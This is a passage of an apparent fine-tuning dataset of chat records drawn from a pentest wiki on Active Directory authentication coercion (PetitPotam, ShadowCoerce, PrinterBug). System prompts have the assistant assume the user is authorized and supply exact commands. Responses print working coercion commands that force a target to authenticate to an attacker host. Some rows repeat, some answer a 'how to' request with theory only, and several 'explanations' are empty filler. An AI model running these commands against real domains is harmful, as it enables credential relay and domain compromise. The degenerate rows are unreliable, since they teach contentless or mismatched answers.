MS-EFSR abuse can be combined with WebClient abuse to elicit incoming authentications made over HTTP which heightens NTLM relay capabilities.\n\nThe following MS-EFSR's methods were detected vulnerable\n\n* EfsRpcOpenFileRaw and EfsRpcEncryptFileSrv (partially patched by Microsoft)\n* EfsRpcEncryptFileSrv, EfsRpcDecryptFileSrv, EfsRpcQueryUsersOnFile, EfsRpcQueryRecoveryAgents, EfsRpcRemoveUsersFromFile, EfsRpcAddUsersToFile, EfsRpcFileKeyInfo, EfsRpcDuplicateEncryptionInfoFile, EfsRpcAddUsersToFileEx (unpatched at the time of this article update, 29th December 2021)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out MS-EFSR abuse (PetitPotam) - Theory during a pentest?", "response": "MS-EFSR is Microsoft's Encrypting File System Remote protocol. It performs maintenance and management operations on encrypted data that is stored remotely and accessed over a network (docs.microsoft.com) and is available as an RPC interface. That interface is available through the \\pipe\\efsrpc, \\pipe\\lsarpc, \\pipe\\samr, \\pipe\\lsass and \\pipe\\netlogon SMB named pipes.\n\nIn 2019, Google's Project Zero research team found and reported a bug on MS-EFSR that could be combined with a NTLM Reflection attack leading to a Local Privilege Elevation. An insufficient path check in MS-EFSR's EfsRpcOpenFileRaw method allowed attackers to force the SYSTEM account into creating an executable file of the attacker's choosing, hence providing the attacker with local admin rights.\n\nWhile the wider implications of this bug, AD-DS-wise, were only suspected, in 2021, Lionel GILLES used that bug to remotely coerce domain-joined machine's authentication. The coerced authentications are made over SMB. But MS-EFSR abuse can be combined with WebClient abuse to elicit incoming authentications made over HTTP which heightens NTLM relay capabilities.\n\nThe following MS-EFSR's methods were detected vulnerable\n\n* EfsRpcOpenFileRaw and EfsRpcEncryptFileSrv (partially patched by Microsoft)\n* EfsRpcEncryptFileSrv, EfsRpcDecryptFileSrv, EfsRpcQueryUsersOnFile, EfsRpcQueryRecoveryAgents, EfsRpcRemoveUsersFromFile, EfsRpcAddUsersToFile, EfsRpcFileKeyInfo, EfsRpcDuplicateEncryptionInfoFile, EfsRpcAddUsersToFileEx (unpatched at the time of this article update, 29th December 2021)", "metadata": {"corpus_index": 873, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-efsr.md", "page_title": "MS-EFSR abuse (PetitPotam)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about MS-EFSR abuse (PetitPotam) - Practice?"}, {"role": "assistant", "content": "An authentication can be forced with the original author's proof-of-concepts dubbed \"PetitPotam\" (available in C and Python) by using a valid AD account's credentials.\n\n``bash\nPetitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP\n`\n\nAn alternative Python implementation (https://github.com/ly4k/PetitPotam) can be used to exploit other unpatched methods that the original implementation doesn't feature.\n\n`bash\npetitpotam.py -method AddUsersToFile $TARGET_IP '\\\\$ATTACKER_IP\\share\\foo'\n`\n\n> [!TIP]\n> Nota bene: coerced NTLM authentications made over SMB restrict the possibilities of NTLM relay. For instance, an \"unsigning cross-protocols relay attack\" from SMB to LDAP will only be possible if the target is vulnerable to CVE-2019-1040 or CVE-2019-1166.\n\n> [!IMPORTANT]\n> Some tests conducted in lab environments showed that, unlike the MS-RPRN abuse (printbug), a NULL session could potentially be used to trigger that bug, unauthenticated, if allowed by the target. This has only been verified to be working on on Windows Server 2016 and Windows Server 2019 Domain Controllers.\n> \n> `bash\n> Petitpotam.py $ATTACKER_IP $TARGET_IP\n> `\n\n> [!NOTE]\n> For the proof of concept to work, using a proper security provider (RPC_C_AUTHN_WINNT) and authentication level (RPC_C_AUTHN_LEVEL_PKT_PRIVACY`) can be required, especially if the target is patched against MS-EFSR abuse (which doesn't completely mitigate the vulnerability). In both tools mentioned above, this is enabled by default only on topotam's one."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about MS-EFSR abuse (PetitPotam) - Practice?", "response": "An authentication can be forced with the original author's proof-of-concepts dubbed \"PetitPotam\" (available in C and Python) by using a valid AD account's credentials.\n\n``bash\nPetitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP\n`\n\nAn alternative Python implementation (https://github.com/ly4k/PetitPotam) can be used to exploit other unpatched methods that the original implementation doesn't feature.\n\n`bash\npetitpotam.py -method AddUsersToFile $TARGET_IP '\\\\$ATTACKER_IP\\share\\foo'\n`\n\n> [!TIP]\n> Nota bene: coerced NTLM authentications made over SMB restrict the possibilities of NTLM relay. For instance, an \"unsigning cross-protocols relay attack\" from SMB to LDAP will only be possible if the target is vulnerable to CVE-2019-1040 or CVE-2019-1166.\n\n> [!IMPORTANT]\n> Some tests conducted in lab environments showed that, unlike the MS-RPRN abuse (printbug), a NULL session could potentially be used to trigger that bug, unauthenticated, if allowed by the target. This has only been verified to be working on on Windows Server 2016 and Windows Server 2019 Domain Controllers.\n> \n> `bash\n> Petitpotam.py $ATTACKER_IP $TARGET_IP\n> `\n\n> [!NOTE]\n> For the proof of concept to work, using a proper security provider (RPC_C_AUTHN_WINNT) and authentication level (RPC_C_AUTHN_LEVEL_PKT_PRIVACY`) can be required, especially if the target is patched against MS-EFSR abuse (which doesn't completely mitigate the vulnerability). In both tools mentioned above, this is enabled by default only on topotam's one.", "metadata": {"corpus_index": 874, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-efsr.md", "page_title": "MS-EFSR abuse (PetitPotam)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform MS-EFSR abuse (PetitPotam) - Practice?"}, {"role": "assistant", "content": "An authentication can be forced with the original author's proof-of-concepts dubbed \"PetitPotam\" (available in C and Python) by using a valid AD account's credentials.\n\n``bash\nPetitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP\n`\n\nAn alternative Python implementation (https://github.com/ly4k/PetitPotam) can be used to exploit other unpatched methods that the original implementation doesn't feature.\n\n`bash\npetitpotam.py -method AddUsersToFile $TARGET_IP '\\\\$ATTACKER_IP\\share\\foo'\n`\n\n> [!TIP]\n> Nota bene: coerced NTLM authentications made over SMB restrict the possibilities of NTLM relay. For instance, an \"unsigning cross-protocols relay attack\" from SMB to LDAP will only be possible if the target is vulnerable to CVE-2019-1040 or CVE-2019-1166.\n\n> [!IMPORTANT]\n> Some tests conducted in lab environments showed that, unlike the MS-RPRN abuse (printbug), a NULL session could potentially be used to trigger that bug, unauthenticated, if allowed by the target. This has only been verified to be working on on Windows Server 2016 and Windows Server 2019 Domain Controllers.\n> \n> `bash\n> Petitpotam.py $ATTACKER_IP $TARGET_IP\n> `\n\n> [!NOTE]\n> For the proof of concept to work, using a proper security provider (RPC_C_AUTHN_WINNT) and authentication level (RPC_C_AUTHN_LEVEL_PKT_PRIVACY`) can be required, especially if the target is patched against MS-EFSR abuse (which doesn't completely mitigate the vulnerability). In both tools mentioned above, this is enabled by default only on topotam's one."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform MS-EFSR abuse (PetitPotam) - Practice?", "response": "An authentication can be forced with the original author's proof-of-concepts dubbed \"PetitPotam\" (available in C and Python) by using a valid AD account's credentials.\n\n``bash\nPetitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP\n`\n\nAn alternative Python implementation (https://github.com/ly4k/PetitPotam) can be used to exploit other unpatched methods that the original implementation doesn't feature.\n\n`bash\npetitpotam.py -method AddUsersToFile $TARGET_IP '\\\\$ATTACKER_IP\\share\\foo'\n`\n\n> [!TIP]\n> Nota bene: coerced NTLM authentications made over SMB restrict the possibilities of NTLM relay. For instance, an \"unsigning cross-protocols relay attack\" from SMB to LDAP will only be possible if the target is vulnerable to CVE-2019-1040 or CVE-2019-1166.\n\n> [!IMPORTANT]\n> Some tests conducted in lab environments showed that, unlike the MS-RPRN abuse (printbug), a NULL session could potentially be used to trigger that bug, unauthenticated, if allowed by the target. This has only been verified to be working on on Windows Server 2016 and Windows Server 2019 Domain Controllers.\n> \n> `bash\n> Petitpotam.py $ATTACKER_IP $TARGET_IP\n> `\n\n> [!NOTE]\n> For the proof of concept to work, using a proper security provider (RPC_C_AUTHN_WINNT) and authentication level (RPC_C_AUTHN_LEVEL_PKT_PRIVACY`) can be required, especially if the target is patched against MS-EFSR abuse (which doesn't completely mitigate the vulnerability). In both tools mentioned above, this is enabled by default only on topotam's one.", "metadata": {"corpus_index": 874, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-efsr.md", "page_title": "MS-EFSR abuse (PetitPotam)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the Petitpotam.py command for ms-efsr abuse (petitpotam) - practice"}, {"role": "assistant", "content": "Petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the Petitpotam.py command for ms-efsr abuse (petitpotam) - practice", "response": "Petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP", "metadata": {"corpus_index": 875, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-efsr.md", "page_title": "MS-EFSR abuse (PetitPotam)", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Petitpotam.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for MS-EFSR abuse (PetitPotam) - Practice?"}, {"role": "assistant", "content": "Petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for MS-EFSR abuse (PetitPotam) - Practice?", "response": "Petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP", "metadata": {"corpus_index": 875, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-efsr.md", "page_title": "MS-EFSR abuse (PetitPotam)", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP`?"}, {"role": "assistant", "content": "This command is used for ms-efsr abuse (petitpotam) - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP`?", "response": "This command is used for ms-efsr abuse (petitpotam) - practice. Practice", "metadata": {"corpus_index": 875, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-efsr.md", "page_title": "MS-EFSR abuse (PetitPotam)", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the petitpotam.py syntax for ms-efsr abuse (petitpotam) - practice?"}, {"role": "assistant", "content": "petitpotam.py -method AddUsersToFile $TARGET_IP '\\\\$ATTACKER_IP\\share\\foo'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the petitpotam.py syntax for ms-efsr abuse (petitpotam) - practice?", "response": "petitpotam.py -method AddUsersToFile $TARGET_IP '\\\\$ATTACKER_IP\\share\\foo'", "metadata": {"corpus_index": 876, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-efsr.md", "page_title": "MS-EFSR abuse (PetitPotam)", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "petitpotam.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on MS-EFSR abuse (PetitPotam) - Practice"}, {"role": "assistant", "content": "petitpotam.py -method AddUsersToFile $TARGET_IP '\\\\$ATTACKER_IP\\share\\foo'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on MS-EFSR abuse (PetitPotam) - Practice", "response": "petitpotam.py -method AddUsersToFile $TARGET_IP '\\\\$ATTACKER_IP\\share\\foo'", "metadata": {"corpus_index": 876, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-efsr.md", "page_title": "MS-EFSR abuse (PetitPotam)", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `petitpotam.py -method AddUsersToFile $TARGET_IP '\\\\$ATTACKER_IP\\share\\foo'`?"}, {"role": "assistant", "content": "This command is used for ms-efsr abuse (petitpotam) - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `petitpotam.py -method AddUsersToFile $TARGET_IP '\\\\$ATTACKER_IP\\share\\foo'`?", "response": "This command is used for ms-efsr abuse (petitpotam) - practice. Practice", "metadata": {"corpus_index": 876, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-efsr.md", "page_title": "MS-EFSR abuse (PetitPotam)", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is MS-FSRVP abuse (ShadowCoerce) - Theory?"}, {"role": "assistant", "content": "MS-FSRVP is Microsoft's File Server Remote VSS Protocol. It's used for creating shadow copies of file shares on a remote computer, and for facilitating backup applications in performing application-consistent backup and restore of data on SMB2 shares (docs.microsoft.com). That interface is available through the \\pipe\\FssagentRpc SMB named pipe.\n\nIn late 2021, Lionel GILLES published slides showcasing PetitPotam and demonstrating the possibility of abusing the protocol to coerce authentications on the last two slides.\n\nSimilarly to other MS-RPC abuses, this works by using a specific method relying on remote UNC paths. In this case, at the time of writing, two methods were detected as vulnerable: IsPathSupported and IsPathShadowCopied.\n\nThe coerced authentications are made over SMB. Unlike other similar coercion methods (MS-RPRN printerbug, MS-EFSR petitpotam), I doubt MS-FSRVP abuse can be combined with WebClient abuse to elicit incoming authentications made over HTTP.\n\nA requirement to the abuse is to have the \"File Server VSS Agent Service\" enabled on the target server.\n\n![](<./assets/File Server VSS Agent Service.png>)\n\n> [!TIP]\n> In June 2022, Microsoft patched CVE-2022-30154 in KB5014692, which also patched this coercion attack."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is MS-FSRVP abuse (ShadowCoerce) - Theory?", "response": "MS-FSRVP is Microsoft's File Server Remote VSS Protocol. It's used for creating shadow copies of file shares on a remote computer, and for facilitating backup applications in performing application-consistent backup and restore of data on SMB2 shares (docs.microsoft.com). That interface is available through the \\pipe\\FssagentRpc SMB named pipe.\n\nIn late 2021, Lionel GILLES published slides showcasing PetitPotam and demonstrating the possibility of abusing the protocol to coerce authentications on the last two slides.\n\nSimilarly to other MS-RPC abuses, this works by using a specific method relying on remote UNC paths. In this case, at the time of writing, two methods were detected as vulnerable: IsPathSupported and IsPathShadowCopied.\n\nThe coerced authentications are made over SMB. Unlike other similar coercion methods (MS-RPRN printerbug, MS-EFSR petitpotam), I doubt MS-FSRVP abuse can be combined with WebClient abuse to elicit incoming authentications made over HTTP.\n\nA requirement to the abuse is to have the \"File Server VSS Agent Service\" enabled on the target server.\n\n![](<./assets/File Server VSS Agent Service.png>)\n\n> [!TIP]\n> In June 2022, Microsoft patched CVE-2022-30154 in KB5014692, which also patched this coercion attack.", "metadata": {"corpus_index": 877, "category": "web", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-fsrvp.md", "page_title": "MS-FSRVP abuse (ShadowCoerce)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for MS-FSRVP abuse (ShadowCoerce) - Theory"}, {"role": "assistant", "content": "MS-FSRVP is Microsoft's File Server Remote VSS Protocol. It's used for creating shadow copies of file shares on a remote computer, and for facilitating backup applications in performing application-consistent backup and restore of data on SMB2 shares (docs.microsoft.com). That interface is available through the \\pipe\\FssagentRpc SMB named pipe.\n\nIn late 2021, Lionel GILLES published slides showcasing PetitPotam and demonstrating the possibility of abusing the protocol to coerce authentications on the last two slides.\n\nSimilarly to other MS-RPC abuses, this works by using a specific method relying on remote UNC paths. In this case, at the time of writing, two methods were detected as vulnerable: IsPathSupported and IsPathShadowCopied.\n\nThe coerced authentications are made over SMB. Unlike other similar coercion methods (MS-RPRN printerbug, MS-EFSR petitpotam), I doubt MS-FSRVP abuse can be combined with WebClient abuse to elicit incoming authentications made over HTTP.\n\nA requirement to the abuse is to have the \"File Server VSS Agent Service\" enabled on the target server.\n\n![](<./assets/File Server VSS Agent Service.png>)\n\n> [!TIP]\n> In June 2022, Microsoft patched CVE-2022-30154 in KB5014692, which also patched this coercion attack."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for MS-FSRVP abuse (ShadowCoerce) - Theory", "response": "MS-FSRVP is Microsoft's File Server Remote VSS Protocol. It's used for creating shadow copies of file shares on a remote computer, and for facilitating backup applications in performing application-consistent backup and restore of data on SMB2 shares (docs.microsoft.com). That interface is available through the \\pipe\\FssagentRpc SMB named pipe.\n\nIn late 2021, Lionel GILLES published slides showcasing PetitPotam and demonstrating the possibility of abusing the protocol to coerce authentications on the last two slides.\n\nSimilarly to other MS-RPC abuses, this works by using a specific method relying on remote UNC paths. In this case, at the time of writing, two methods were detected as vulnerable: IsPathSupported and IsPathShadowCopied.\n\nThe coerced authentications are made over SMB. Unlike other similar coercion methods (MS-RPRN printerbug, MS-EFSR petitpotam), I doubt MS-FSRVP abuse can be combined with WebClient abuse to elicit incoming authentications made over HTTP.\n\nA requirement to the abuse is to have the \"File Server VSS Agent Service\" enabled on the target server.\n\n![](<./assets/File Server VSS Agent Service.png>)\n\n> [!TIP]\n> In June 2022, Microsoft patched CVE-2022-30154 in KB5014692, which also patched this coercion attack.", "metadata": {"corpus_index": 877, "category": "web", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-fsrvp.md", "page_title": "MS-FSRVP abuse (ShadowCoerce)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain MS-FSRVP abuse (ShadowCoerce) - Practice"}, {"role": "assistant", "content": "The following Python proof-of-concept (https://github.com/ShutdownRepo/ShadowCoerce) implements the IsPathSupported and IsPathShadowCopied methods.\n\n> [!NOTE]\n> For the proof of concept to work, using a proper security provider (RPC_C_AUTHN_WINNT) and authentication level (RPC_C_AUTHN_LEVEL_PKT_PRIVACY) can required. It is enabled by default in the script.\n\n``bash\nshadowcoerce.py -d \"domain\" -u \"user\" -p \"password\" LISTENER TARGET\n``\n\n![](<./assets/MS FSRVP abuse example.png>)\n\n> [!NOTE]\n> In my tests, the coercion needed to be attempted twice in order to work when the FssAgent hadn't been requested in a while. In short, run the command again if it doesn't work the first time."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain MS-FSRVP abuse (ShadowCoerce) - Practice", "response": "The following Python proof-of-concept (https://github.com/ShutdownRepo/ShadowCoerce) implements the IsPathSupported and IsPathShadowCopied methods.\n\n> [!NOTE]\n> For the proof of concept to work, using a proper security provider (RPC_C_AUTHN_WINNT) and authentication level (RPC_C_AUTHN_LEVEL_PKT_PRIVACY) can required. It is enabled by default in the script.\n\n``bash\nshadowcoerce.py -d \"domain\" -u \"user\" -p \"password\" LISTENER TARGET\n``\n\n![](<./assets/MS FSRVP abuse example.png>)\n\n> [!NOTE]\n> In my tests, the coercion needed to be attempted twice in order to work when the FssAgent hadn't been requested in a while. In short, run the command again if it doesn't work the first time.", "metadata": {"corpus_index": 878, "category": "web", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-fsrvp.md", "page_title": "MS-FSRVP abuse (ShadowCoerce)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on MS-FSRVP abuse (ShadowCoerce) - Practice"}, {"role": "assistant", "content": "The following Python proof-of-concept (https://github.com/ShutdownRepo/ShadowCoerce) implements the IsPathSupported and IsPathShadowCopied methods.\n\n> [!NOTE]\n> For the proof of concept to work, using a proper security provider (RPC_C_AUTHN_WINNT) and authentication level (RPC_C_AUTHN_LEVEL_PKT_PRIVACY) can required. It is enabled by default in the script.\n\n``bash\nshadowcoerce.py -d \"domain\" -u \"user\" -p \"password\" LISTENER TARGET\n``\n\n![](<./assets/MS FSRVP abuse example.png>)\n\n> [!NOTE]\n> In my tests, the coercion needed to be attempted twice in order to work when the FssAgent hadn't been requested in a while. In short, run the command again if it doesn't work the first time."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on MS-FSRVP abuse (ShadowCoerce) - Practice", "response": "The following Python proof-of-concept (https://github.com/ShutdownRepo/ShadowCoerce) implements the IsPathSupported and IsPathShadowCopied methods.\n\n> [!NOTE]\n> For the proof of concept to work, using a proper security provider (RPC_C_AUTHN_WINNT) and authentication level (RPC_C_AUTHN_LEVEL_PKT_PRIVACY) can required. It is enabled by default in the script.\n\n``bash\nshadowcoerce.py -d \"domain\" -u \"user\" -p \"password\" LISTENER TARGET\n``\n\n![](<./assets/MS FSRVP abuse example.png>)\n\n> [!NOTE]\n> In my tests, the coercion needed to be attempted twice in order to work when the FssAgent hadn't been requested in a while. In short, run the command again if it doesn't work the first time.", "metadata": {"corpus_index": 878, "category": "web", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-fsrvp.md", "page_title": "MS-FSRVP abuse (ShadowCoerce)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the shadowcoerce.py command for ms-fsrvp abuse (shadowcoerce) - practice"}, {"role": "assistant", "content": "shadowcoerce.py -d \"domain\" -u \"user\" -p \"password\" LISTENER TARGET"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the shadowcoerce.py command for ms-fsrvp abuse (shadowcoerce) - practice", "response": "shadowcoerce.py -d \"domain\" -u \"user\" -p \"password\" LISTENER TARGET", "metadata": {"corpus_index": 879, "category": "web", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-fsrvp.md", "page_title": "MS-FSRVP abuse (ShadowCoerce)", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "shadowcoerce.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through MS-FSRVP abuse (ShadowCoerce) - Practice"}, {"role": "assistant", "content": "shadowcoerce.py -d \"domain\" -u \"user\" -p \"password\" LISTENER TARGET"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through MS-FSRVP abuse (ShadowCoerce) - Practice", "response": "shadowcoerce.py -d \"domain\" -u \"user\" -p \"password\" LISTENER TARGET", "metadata": {"corpus_index": 879, "category": "web", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-fsrvp.md", "page_title": "MS-FSRVP abuse (ShadowCoerce)", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `shadowcoerce.py -d \"domain\" -u \"user\" -p \"password\" LISTENER TARGET`?"}, {"role": "assistant", "content": "This command is used for ms-fsrvp abuse (shadowcoerce) - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `shadowcoerce.py -d \"domain\" -u \"user\" -p \"password\" LISTENER TARGET`?", "response": "This command is used for ms-fsrvp abuse (shadowcoerce) - practice. Practice", "metadata": {"corpus_index": 879, "category": "web", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-fsrvp.md", "page_title": "MS-FSRVP abuse (ShadowCoerce)", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about MS-RPRN abuse (PrinterBug) - Theory?"}, {"role": "assistant", "content": "Microsoft’s Print Spooler is a service handling the print jobs and other various tasks related to printing. An attacker controling a domain user/computer can, with a specific RPC call, trigger the spooler service of a target running it and make it authenticate to a target of the attacker's choosing. This flaw is a \"won't fix\" and enabled by default on all Windows environments (more info on the finding).\n\nThe coerced authentications are made over SMB. But MS-RPRN abuse can be combined with WebClient abuse to elicit incoming authentications made over HTTP which heightens NTLM relay capabilities.\n\nThe \"specific call\" mentioned above is the RpcRemoteFindFirstPrinterChangeNotificationEx notification method, which is part of the MS-RPRN protocol. MS-RPRN is Microsoft’s Print System Remote Protocol. It defines the communication of print job processing and print system management between a print client and a print server.\n\n> [!TIP]\n> The attacker needs a foothold on the domain (i.e. compromised account) for this attack to work since the coercion is operated through an RPC call in the SMB \\pipe\\spoolss named pipe through the IPC$ share."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about MS-RPRN abuse (PrinterBug) - Theory?", "response": "Microsoft’s Print Spooler is a service handling the print jobs and other various tasks related to printing. An attacker controling a domain user/computer can, with a specific RPC call, trigger the spooler service of a target running it and make it authenticate to a target of the attacker's choosing. This flaw is a \"won't fix\" and enabled by default on all Windows environments (more info on the finding).\n\nThe coerced authentications are made over SMB. But MS-RPRN abuse can be combined with WebClient abuse to elicit incoming authentications made over HTTP which heightens NTLM relay capabilities.\n\nThe \"specific call\" mentioned above is the RpcRemoteFindFirstPrinterChangeNotificationEx notification method, which is part of the MS-RPRN protocol. MS-RPRN is Microsoft’s Print System Remote Protocol. It defines the communication of print job processing and print system management between a print client and a print server.\n\n> [!TIP]\n> The attacker needs a foothold on the domain (i.e. compromised account) for this attack to work since the coercion is operated through an RPC call in the SMB \\pipe\\spoolss named pipe through the IPC$ share.", "metadata": {"corpus_index": 880, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/ms-rprn.md", "page_title": "MS-RPRN abuse (PrinterBug)", "augmentation_kind": "none", 